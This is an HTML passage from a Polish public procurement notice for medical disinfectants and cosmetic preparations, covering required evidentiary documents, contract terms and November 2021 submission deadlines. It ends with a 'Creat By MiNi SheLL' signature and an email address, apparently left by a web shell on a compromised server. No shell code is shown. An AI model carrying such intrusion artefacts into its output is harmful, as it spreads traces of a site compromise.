kosmetycznych,<br/>3) Oświadczenie Wykonawcy o posiadaniu dokumentów potwierdzających, że oferowane preparaty spełniają wymagania określone przez Zamawiającego w zakresie spektrum i czasu działania w zastosowaniu w obszarze medycznym, dla których Zamawiający określił spektrum i czas działania oraz posiadają badania mikrobiologiczne odpowiadające Normom Europejskim, wykonane w laboratoriach akredytowanych na terenie Unii Europejskiej, wraz z zobowiązaniem ich przekazania na każde żądanie Zamawiającego - dotyczy produktów leczniczych, wyrobów medycznych, produktów biobójczych, <br/>4)pozytywne opinie producentów endoskopów Olympus dopuszczające stosowanie zaoferowanych w zadaniu nr 1poz. 1 środków dezynfekcyjnych w endoskopach <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 1) opisy lub katalogi bądź karty techniczne oferowanych przez Wykonawcę towarów, potwierdzające, że oferowane przez Wykonawcę towary odpowiadają określonym przez Zamawiającego w załączniku nr 1 wymaganiom, <br/>2) Dla potwierdzenia, że oferowane przez Wykonawcę towary są dopuszczone do obrotu i używania następujące dokumenty: <br/>a) w zakresie towarów będących wyrobami medycznym - dopuszczenie do obrotu wyrobu medycznego zgodnie z przepisami aktualnie obowiązującej ustawy o wyrobach medycznych,<br/>b) w zakresie towarów będących produktami leczniczymi – dopuszczenie do obrotu produktu leczniczego na terenie RP zgodnie z przepisami aktualnie obowiązującej ustawy Prawo Farmaceutyczne,<br/>c) w zakresie towarów będących produktami biobójczymi – pozwolenie na wprowadzenia do obrotu produktu biobójczego zgodnie z aktualnie obowiązującą ustawą o produktach biobójczych,<br/>d) w zakresie towarów będących kosmetykami – oświadczenia o wprowadzeniu do obrotu kosmetyku zgodnie z aktualnie obowiązującym Rozporządzeniem Parlamentu Europejskiego i Rady WE w sprawie produktów kosmetycznych,<br/>3) Oświadczenie Wykonawcy o posiadaniu dokumentów potwierdzających, że oferowane preparaty spełniają wymagania określone przez Zamawiającego w zakresie spektrum i czasu działania w zastosowaniu w obszarze medycznym, dla których Zamawiający określił spektrum i czas działania oraz posiadają badania mikrobiologiczne odpowiadające Normom Europejskim, wykonane w laboratoriach akredytowanych na terenie Unii Europejskiej, wraz z zobowiązaniem ich przekazania na każde żądanie Zamawiającego - dotyczy produktów leczniczych, wyrobów medycznych, produktów biobójczych, <br/>4)pozytywne opinie producentów endoskopów Olympus dopuszczające stosowanie zaoferowanych w zadaniu nr 1poz. 1 środków dezynfekcyjnych w endoskopach <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o<br/>udzieleniezamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w<br/>sprawiezamówieniapublicznego. W związku z tym należy wskazane pełnomocnictwo<br/>złożyćwrazzofertą.2) O iledotyczy - W odniesieniu do warunku udziału w<br/>postępowaniudotyczącegozdolności technicznejlub zawodowej wykonawcy wspólnie ubiegający<br/>się oudzieleniezamówienia mogą polegać nazdolnościach tych z wykonawców, którzy<br/>wykonająrobotybudowlane, do realizacji których tezdolności są wymagane. W tym<br/>przypadku,wykonawcywspólnie ubiegający się o udzieleniezamówienia dołączają do oferty<br/>oświadczenie, zktóregowynika, które roboty budowlanewykonają poszczególni wykonawcy.3)<br/>Wykonawcy występującywspólnie powinni złożyćoświadczenia i dokumenty, o których mowa w niniejszym rozdziale SWZ,z tym, że oświadczeniewstępne wymienione w ust. 1 niniejszego<br/>rozdziału SWZ(oświadczeniewg wzoru stanowiącegozałącznik nr 4 do SWZ) oraz dokumenty<br/>wskazane w ust.8 pkt3niniejszego rozdziałuSWZ(dokumenty potwierdzające brak przesłanek do<br/>wykluczeniawykonawcy) składa każdyWykonawca z osobna, natomiast pozostałe dokumenty<br/>luboświadczenia potwierdzającespełnianie warunków udziału w postępowaniu określonych<br/>przezZamawiającego mogą byćskładane wspólnie.4) Zamawiający nie zastrzega<br/>obowiązkuosobistego wykonania przezposzczególnych wykonawców wspólnie ubiegających się<br/>oudzielenie zamówienia publicznegokluczowych zadań dotyczących przedmiotowego<br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunków ich wprowadzania został określony w<br/>załącznikunr2 do SWZ w paragrafie 5 oraz w paragrafie 12 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-11-10 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://miniportal.uzp.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-11-10 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-12-10</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com